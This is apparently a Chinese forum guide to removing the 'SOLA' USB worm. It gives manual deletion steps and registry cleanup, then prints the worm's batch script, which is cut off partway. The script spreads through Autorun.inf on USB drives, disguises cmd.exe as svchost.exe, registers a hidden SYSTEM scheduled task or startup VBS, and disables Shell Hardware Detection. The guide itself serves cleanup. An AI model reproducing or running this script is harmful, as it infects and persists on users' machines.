壹、進安全模式
1.同樣用“資源管理器”進入各盤符目錄下,刪除隱藏的“SOLA”文件夾和“Autorun.inf”文件
然後去360網站上下載壹個“U盤病毒專殺工具”查殺完後彈出窗口“是否……”點擊“是”,然後會詢問“是否創建XXX”
點擊創建,該軟件就會在各個盤符下創建壹個名問“Autorun.inf”的假病毒文件,這樣就能防止病毒再創建此文件。
2.“搜索文件或文件夾”關鍵字“sola”的所有文件和文件夾,刪除所有有關sola這個名字的文件和文件夾。
3.可手動找到並刪除下列文件。
%systemroot%\\Fonts\\Regedit.reg
%systemroot%\\Fonts\\sleep.exe
%systemroot%\\Fonts\\SOLA.BAT
%systemroot%\\Fonts\\est_type2032.fon
%systemroot%\\Tasks\\Tasks.job
%systemroot%\\Fonts\\solasetup
%systemroot%\\Tasks\\Tasks.job
4.按創建時間排序,刪除所有和其同壹時間創建的文件。
5.打開註冊表(點擊“開始”——“運行”,輸入“regedit”,回車)
6.鼠標點選註冊表左邊目錄最上方“我的電腦”,然後點擊“編輯”——“查找”,輸入“SOLA”刪除所有相關的“項”“值”“數據”
註:有些軟件的名字中帶有“SOLA”,但並不是病毒,要區分開來。(如下圖所示就不屬於病毒項)病毒的“項”“值”“數據”壹般壹眼就能看出。
[attach]27266[/attach]
-----------------------
7.木馬為了能夠在開機後自動運行,往往在註冊表如下選項中添加註冊表項:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
刪除不明項。(也可用360安全衛士查看啟動項)
在“C:\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啟動”中有壹個SOLA.vbs文件
(註:這裏我記得不太清楚了,因為我忘了保存該文件的樣本)
8.最後再檢查壹下所有盤符,看看“SOLA”文件夾是否刪除幹凈,如還存在需再刪壹次,“Autorun.inf”文件就不需要刪除了,那是專殺工具創建用來欺騙病毒的文件。
9.刪除妳的U盤、MP3等壹切USB接口硬件中的“SOLA”文件夾;當然用手機內存讀卡器的也會中標。
10.重啟電腦,搞定。
下面附上“sola.bat”中的內容:
@echo off
set sola=%systemroot%\\Fonts
set setup=%systemroot%\\Fonts\\solasetup
if not \"%1\"==\"-USB\" goto Start
start /max ..
if exist %sola%\\SOLA.BAT goto End
::========================Infect==============================
:Infect
cd\\
md %systemroot%\\Fonts\\solasetup
::————文件復制---------
copy sola\\Autorun.inf %setup%\\Autorun.inf
copy sola\\SOLA.BAT %setup%\\SOLA.BAT
copy sola\\宅男請進.RAR %setup%\\宅男請進.RAR
copy sola\\Tasks.xxx %setup%\\Tasks.xxx
copy sola\\sleep.exe %setup%\\sleep.exe
tasklist >%sola%\\task.txt
FOR /F \"tokens=1\" %%i in (\'findstr /I \"svchost.exe\" \"%sola%\\task.txt\"\') do set svchost=%%i
copy %systemroot%\\system32\\cmd.exe %sola%\\%svchost%
del %sola%\\task.txt
:Tasks
copy %setup%\\Tasks.xxx %systemroot%\\Tasks\\Tasks.job
schtasks /change /ru \"NT AUTHORITY\\SYSTEM\" /tn \"Tasks\" if errorlevel 1 goto TaskFail
goto TaskSuc
:TaskFail
%homedrive%
cd \"%ALLUSERSPROFILE%\"
cd 「開始」菜單\\程序\\啟動
echo On Error Resume Next>SOLA.VBS
echo set ws=wscript.createobject(\"wscript.shell\")>>SOLA.VBS
echo ws.run \"%sola%\\svchost.exe /c %sola%\\SOLA.BAT\",0 >>SOLA.VBS
copy SOLA.VBS %sola%\\SOLA.VBS
echo NT>%systemroot%\\Fonts\\NoTasks
:TaskSuc
attrib %systemroot%\\Tasks\\Tasks.job +s +h +r
copy %setup%\\sola.bat %sola%\\sola.bat
copy %setup%\\sleep.exe %systemroot%\\system32\\sleep.exe
:NoAutoPlay
net stop \"Shell Hardware Detection\"
echo Windows Registry Editor Version 5.00>%systemroot%\\Fonts\\Regedit.reg
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\ShellHWDetection]>>%systemroot%\\Fonts\\Regedit.reg
echo \"Start\"=dword:00000004>>%systemroot%\\Fonts\\Regedit.reg
start regedit /s %systemroot%\\Fonts\\Regedit.reg
:KillTMG
goto End
::======================Infect======================================
::======================Start=======================================
:Start
%homedrive%
cd \"%ALLUSERSPROFILE%\"
cd 「開始」菜單\\程序\\啟動
date /t >%sola%\\est_type2032.fon
findstr /c:\"-10-01\" \"%sola%\\est_type2032.fon\" if not errorlevel 1 goto DayOn
if exist %systemroot%\\Fonts\\NoTasks if not exist SOLA.VBS copy %sola%\\SOLA.VBS SOLA.VBS
:Continue
sleep 300set C=0 & echo 1>C:\\solachk1 & findstr . C:\\solachk1 & if not errorlevel 1 del C:\\solachk1 & sleep 1000&set C=1 & findstr /C:\"SOLA_1.0\" C:\\Autorun.inf & if errorlevel 1 attrib -s -h -r C:\\Autorun.inf